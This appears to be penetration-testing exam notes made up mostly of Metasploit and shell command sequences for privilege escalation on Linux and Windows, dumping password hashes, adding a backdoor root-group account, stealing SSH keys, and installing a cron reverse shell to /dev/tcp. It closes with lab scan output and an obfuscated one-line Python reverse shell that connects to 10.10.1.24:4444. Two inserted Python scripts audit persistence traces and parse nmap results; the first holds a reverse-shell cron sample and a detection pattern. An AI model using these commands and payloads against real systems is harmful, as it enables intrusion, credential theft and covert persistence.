> set SESSION <Meterpreter>
> run
> loot
> search env platform:linux
> use post/multi/gather/env
> set SESSION <id>
> run
> search enum_network
> use post/linux/gather/enum_network
> set SESSION <id>
> run
> search enum_protections
> set SESSION <id>
> run
> notes
> search enum_system
> set SESSION <id>
> run
> search checkcontainer
> set SESSION <id>
> run
> search enum_users_history
> set SESSION <id>
> run

Linux Privilege Escalation

> setg RHOSTS <IP>
> search ssh_login
> use auxiliary/scanner/ssh/ssh_login
> set USERNAME jackie
> set PASSWORD password
> exploit
> sessions 1 
> pwd
> whoami
> background
> sessions -u 1 
> sessions 2
> sysinfo
> getuid
> bash
> ps aux 
> cat /bin/check-down
> chkrootkit --help
> chkrootkit -V
> background
> search chkrootkit
> show options
> set CHKROOTKIT /bin/chkrootkit
> set SESSION <mp-id>
> set LHOST eth1
> exploit
> /bin/bash -i

Dumping Hashes with Hashdump

> setg RHOSTS <IP>
> use exploit/linux/samba/is_known_pipename
> exploit
> sessions -u 1
> sessions 2
> sysinfo
> getuid
> background
> search hashdump
> use post/linux/gather/hashdump
> show options
> set SESSION <id>
> run
> loot
> sessions 3
> /bin/bash -i

Establishing Persistence on Linux

> use auxiliary/scanner/ssh/ssh_login
> set USERNAME jackie
> set PASSWORD password
> exploit
> sessions
> sessions -u 1
> sessions 2
> search chkrootkit
> set SESSION <id>
> set CHKROOTKIT /bin/chkrootkit
> set LHOST eth1
> set LPORT <>
> exploit
> sessions -u 3
> sessions 4
> getuid
> shell
> /bin/bash -i
> useradd -m ftp -s /bin/bash
> passwd ftp // enter: password123
> cat /etc/passwd
> groups root
> usermod -aG root ftp
> groups ftp
> usermod -u 15 ftp
> cat /etc/passwd
> search platform:linux persistence
> use exploit/linux/local/cron_persistence
> set SESSION 4
> set LPORT 4422
> set LHOST eth1
> exploit // fail
> use exploit/linux/local/service_persistence
> set SESSION 4
> set payload cmd/unix/reverse_python
> set LPORT 4422
> exploit // fail
> set target 4
> exploit // fail
> use exploit/linux/local/sshkey_persistence
> set CREATESSHFOLDER true
> set SESSION 4
> exploit 
> loot
> cat private_key.txt // use from loot
> nano ssh_key // paste the key
> chmod 0400 ssh_key
> ssh -i ssh_key root@<target-ip>

Exploitation

> nmap -sV -O <IP>
> ls -la /usr/share/nmap/scripts | grep banner
> nmap -sV --script=banner <IP>
> nc <IP> <Port>

Nmap Vulnerability Scanning

> nmap -sV -O <IP>
> ls -la /usr/share/nmap/scripts/ | grep http
> nmap -sV --script=http-enum <IP>

Post Exploitation

Methodology

  • Local Enumeration
  • Transferring Files
  • Upgrading Shells
  • Privilege Escalation
  • Persistence
  • Dumping & Cracking Hashes
  • Pivoting
  • Clearing Tracks

Windows

Enum Users & Groups

> use post/windows/gather/enum_logged_on_users
> set SESSION 1
> run
> shell
> net user administrator
> whoami /priv
> route print
> netstat -ano
> netsh firewall show state
> tasklist /SVC // Enumerate the list of running processes

> show_mount
> use post/windows/gather/win_privs
> set SESSION 1
> run
> use post/windows/gather/enum_applications
> use post/windows/gather/enum_computers
> use post/windows/gather/enum_patches

Linux

Enum

> useradd bob -s /bin/bash
> github.com/rebootuser/LinEnum

Windows Priv Escalation

> PrivescCheck
> search web_delivery
> use exploit/multi/script/web_delivery
> set TARGET PSH\ (Binary)
> set payload windows/shell/reverse_tcp
> set PSH-EncodedCommand false
> set LHOST eth1
> exploit
// copy the generated command and paste it into the Windows cmd prompt
> whoami
> background
> use post/multi/manage/shell_to_meterpreter
> set LHOST eth1
> set WIN_TRANSFER VBS
> exploit

Linux Priv Escalation

// Exploiting Permissions
> whoami
> cat /etc/passwd
> find / -not -type l -perm -o+w
> cat /etc/shadow
> openssl passwd -1 -salt abc password
> nano /etc/shadow  // Remove * & paste the hash
> su 

// Exploiting SUDO Privs
> cat /etc/passwd
> sudo -l 
> sudo man cat 
> !/bin/bash

Linux Persistence

// Via SSH Keys
> ssh student@<IP> // password:password
> ls -la
> cat wait
> cd .ssh
> cat id_rsa
> cat authorized_keys
> scp student@<IP>:~/.ssh/id_rsa . // copy id_rsa locally
> chmod 400 id_rsa
> ssh student@<IP> // password:password
> rm wait
> ssh -i id_rsa student@<IP>

// Via Cron Jobs
> ssh student@<IP> // password:password
> cat /etc/cron*
> echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<kali-ip>/<port> 0>&1'" > cron
> cat cron 
> crontab cron // install the file as the user's crontab
> crontab -l
> rm wait
> nc -nvlp 1234
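An audit script for the traces left by both Linux persistence sections above ("Establishing Persistence on Linux": the added 'ftp' login account, its root group membership and the sshkey_persistence module; "Linux Persistence": the copied id_rsa and the cron entry). It is an added example, not from the original notes or from Metasploit; the /etc/passwd, /etc/group, crontab and authorized_keys contents it reads are constructed inline, and the lists of login shells, privileged groups and cron patterns are my own choices.

```python
import base64
import hashlib
import re

INTERACTIVE_SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/bin/zsh", "/usr/bin/bash"}
PRIVILEGED_GROUPS = {"root", "sudo", "wheel", "admin"}
SUSPICIOUS_CRON = re.compile(r"/dev/tcp/|\bnc\b|\bncat\b|bash -i|base64 -d")


def _fake_key_blob(seed: bytes) -> str:
    """Constructed key blob in ssh wire format (type string + 32 bytes).
    Not a real key; it only needs to decode like one."""
    body = b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + hashlib.sha256(seed).digest()
    return base64.b64encode(body).decode()


# Constructed sample files (invented, not from any real host) reproducing the
# changes made above: an 'ftp' login account with a low UID, 'ftp' in the root
# group, a reverse-shell cron entry and a second, unlabelled authorized key.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
student:x:1000:1000::/home/student:/bin/bash
ftp:x:15:1001::/home/ftp:/bin/bash
"""
GROUP = """\
root:x:0:ftp
sudo:x:27:student
"""
CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/find /tmp -mtime +7 -delete
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/203.0.113.5/1234 0>&1'
"""
AUTHORIZED_KEYS = (
    f"ssh-ed25519 {_fake_key_blob(b'student-laptop')} student@laptop\n"
    f"ssh-ed25519 {_fake_key_blob(b'unlabelled')}\n"
)


def audit_passwd(text):
    """Flag UID-0 aliases, shared UIDs and system accounts that can log in."""
    findings, owner = [], {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _, uid, _, _, _, shell = line.split(":")
        uid = int(uid)
        if uid == 0 and name != "root":
            findings.append(f"{name}: UID 0 but not root")
        if uid in owner:
            findings.append(f"{name}: shares UID {uid} with {owner[uid]}")
        owner.setdefault(uid, name)
        if 0 < uid < 1000 and shell in INTERACTIVE_SHELLS:
            findings.append(f"{name}: system UID {uid} with login shell {shell}")
    return findings


def audit_group(text):
    """List every member of a privileged group."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _, _, members = line.split(":")
        if name in PRIVILEGED_GROUPS and members:
            findings.extend(f"{m} is a member of {name}" for m in members.split(","))
    return findings


def audit_crontab(text):
    """Return (line number, reason) for cron entries worth a second look."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        fields = line.strip().split(None, 5)
        if len(fields) < 6 or fields[0].startswith("#"):
            continue
        command = fields[5]
        if SUSPICIOUS_CRON.search(command):
            findings.append((n, "shell/network primitive: " + command))
        elif fields[:5] == ["*"] * 5:
            findings.append((n, "runs every minute: " + command))
    return findings


def audit_authorized_keys(text):
    """Fingerprint every key so unknown ones can be checked against an inventory."""
    keys = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        # an options field (e.g. command="...") may precede the key type
        idx = next((i for i, p in enumerate(parts) if p.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or idx + 1 >= len(parts):
            continue
        digest = hashlib.sha256(base64.b64decode(parts[idx + 1])).digest()
        keys.append({"type": parts[idx],
                     "fingerprint": "SHA256:" + base64.b64encode(digest).decode().rstrip("="),
                     "comment": " ".join(parts[idx + 2:]) or "(no comment)"})
    return keys


if __name__ == "__main__":
    for f in audit_passwd(PASSWD) + audit_group(GROUP):
        print("[passwd/group]", f)
    for n, why in audit_crontab(CRONTAB):
        print(f"[crontab:{n}]", why)
    for k in audit_authorized_keys(AUTHORIZED_KEYS):
        print("[authorized_keys]", k["type"], k["fingerprint"], k["comment"])
```

On a real host the same functions can be fed the contents of /etc/passwd, /etc/group, the output of `crontab -l` for each user and each ~/.ssh/authorized_keys; the SHA256 fingerprint format matches what `ssh-keygen -lf` prints, so unknown keys can be compared against a list of issued ones.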

Exam Notes

Discovery

192.168.100.1

192.168.100.50 192.168.100.51 192.168.100.52 192.168.100.55 192.168.100.63 192.168.100.67

root@kali:~# cat nmap_results.txt 
# Nmap 7.92 scan initiated Sun Oct 27 00:13:58 2024 as: nmap -iL hosts.txt -p- -sV -o nmap_results.txt
Nmap scan report for ip-192-168-100-1.ec2.internal (192.168.100.1)
Host is up (0.00012s latency).
All 65535 scanned ports on ip-192-168-100-1.ec2.internal (192.168.100.1) are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)
MAC Address: 0E:09:28:41:24:0D (Unknown)

Nmap scan report for ip-192-168-100-50.ec2.internal (192.168.100.50)
Host is up (0.00048s latency).
Not shown: 65521 closed tcp ports (reset)
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Apache httpd 2.4.51 ((Win64) PHP/7.4.26)
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3307/tcp  open  opsession-prxy?
3389/tcp  open  ssl/ms-wbt-server?
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49170/tcp open  msrpc              Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3307-TCP:V=7.92%I=7%D=10/27%Time=671D38A8%P=x86_64-pc-linux-gnu%r(N
SF:ULL,5C,"X\0\0\x01\xffj\x04Host\x20'ip-192-168-100-5\.ec2\.internal'\x20
SF:is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20serve
SF:r");
MAC Address: 0E:8E:0B:A8:D8:B7 (Unknown)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Nmap scan report for ip-192-168-100-51.ec2.internal (192.168.100.51)
Host is up (0.00054s latency).
Not shown: 65521 closed tcp ports (reset)
PORT      STATE SERVICE            VERSION
21/tcp    open  ftp                Microsoft ftpd
80/tcp    open  http               Microsoft IIS httpd 8.5
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49170/tcp open  msrpc              Microsoft Windows RPC
MAC Address: 0E:9D:2F:E4:04:19 (Unknown)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Nmap scan report for ip-192-168-100-52.ec2.internal (192.168.100.52)
Host is up (0.00085s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 3.0.3
22/tcp   open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http          Apache httpd 2.4.41
139/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql         MySQL 5.5.5-10.3.34-MariaDB-0ubuntu0.20.04.1
3389/tcp open  ms-wbt-server xrdp
MAC Address: 0E:80:12:6B:30:4D (Unknown)
Service Info: Host: IP-192-168-100-52; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for ip-192-168-100-55.ec2.internal (192.168.100.55)
Host is up (0.00091s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 0E:04:94:F6:FC:91 (Unknown)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Nmap scan report for ip-192-168-100-63.ec2.internal (192.168.100.63)
Host is up (0.00070s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
MAC Address: 0E:BF:EF:1B:8C:55 (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for ip-192-168-100-67.ec2.internal (192.168.100.67)
Host is up (0.00045s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
MAC Address: 0E:64:29:A9:B2:2D (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 27 00:32:24 2024 -- 7 IP addresses (7 hosts up) scanned in 1105.30 seconds
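A parser for nmap's normal output, added here as an example and not part of the original notes or of nmap itself. It turns a scan like the one above into a per-host inventory (hostname, detected OS, open ports with versions) and then lists which hosts expose remote-administration services, which is the first thing to cross-check against what the environment is supposed to look like. The scan text embedded in it is constructed to match the format, and the watchlist of ports is my own choice.

```python
import re

# Constructed excerpt in nmap "normal output" format (invented hosts in the
# 192.0.2.0/24 documentation range, not the scan shown above).
SAMPLE = """\
# Nmap 7.92 scan initiated Sun Oct 27 00:13:58 2024 as: nmap -iL hosts.txt -p- -sV -oN nmap_results.txt
Nmap scan report for ip-192-0-2-1.example.internal (192.0.2.1)
Host is up (0.00012s latency).
All 65535 scanned ports on ip-192-0-2-1.example.internal (192.0.2.1) are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)

Nmap scan report for ip-192-0-2-50.example.internal (192.0.2.50)
Host is up (0.00048s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Apache httpd 2.4.51 ((Win64) PHP/7.4.26)
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3307/tcp  open  opsession-prxy?
3389/tcp  open  ssl/ms-wbt-server?
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Nmap scan report for 192.0.2.67
Host is up (0.00045s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# "Nmap scan report for host (ip)" or "Nmap scan report for ip"
REPORT_RE = re.compile(
    r"^Nmap scan report for (?:(\S+) \((\d{1,3}(?:\.\d{1,3}){3})\)|(\d{1,3}(?:\.\d{1,3}){3}))\s*$")
# "80/tcp    open  http   Apache httpd 2.4.51 ..." (version column is optional)
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*\S))?\s*$")
OS_RE = re.compile(r"OSs?: ([^;]+)")

# Ports whose exposure is worth reviewing on every host (my own watchlist).
REMOTE_ADMIN = {21: "ftp", 22: "ssh", 445: "smb", 3389: "rdp", 5985: "winrm"}


def parse_nmap_normal(text):
    """Parse nmap -oN text into {ip: {"hostname", "os", "ports": [...]}}."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            current = {"hostname": m.group(1), "os": None, "ports": []}
            hosts[m.group(2) or m.group(3)] = current
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            current["ports"].append({"port": int(m.group(1)), "proto": m.group(2),
                                     "state": m.group(3), "service": m.group(4),
                                     "version": m.group(5) or ""})
        elif line.startswith("Service Info:"):
            m = OS_RE.search(line)
            if m:
                current["os"] = m.group(1).strip()
    return hosts


def exposed_services(hosts, watchlist=REMOTE_ADMIN):
    """Sorted (ip, port, label) for every open watchlist port in the inventory."""
    found = [(ip, p["port"], watchlist[p["port"]])
             for ip, info in hosts.items()
             for p in info["ports"]
             if p["state"] == "open" and p["port"] in watchlist]
    return sorted(found)


if __name__ == "__main__":
    inventory = parse_nmap_normal(SAMPLE)
    for ip, info in inventory.items():
        print(f"{ip} ({info['hostname'] or '-'}) os={info['os'] or '?'} open={len(info['ports'])}")
    for ip, port, label in exposed_services(inventory):
        print(f"  review: {ip}:{port} {label}")
```

The parser keeps hosts that answered but showed no open ports (192.0.2.1 in the sample) so that the inventory stays a complete list of live addresses, and it leaves service names such as `opsession-prxy?` untouched: the trailing question mark is nmap's own marker that the guess was not confirmed, which is exactly the kind of entry the MariaDB fingerprint in the scan above shows needs a manual look.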
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.0.50:         - 192.168.0.50:80 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:135 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:139 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:445 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:3389 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:5985 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:47001 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:49669 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:49664 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:49665 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:49666 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:49671 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:49667 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:49670 - TCP OPEN
[+] 192.168.0.50:         - 192.168.0.50:49672 - TCP OPEN
[*] 192.168.0.50:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


[*] Performing ping sweep for IP range 192.168.0.0/24
[+]     192.168.0.1 host found
[+]     192.168.0.57 host found
[+]     192.168.0.51 host found
[+]     192.168.0.50 host found
[*] Post module execution completed
python -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.10.1.24', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for 
__g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"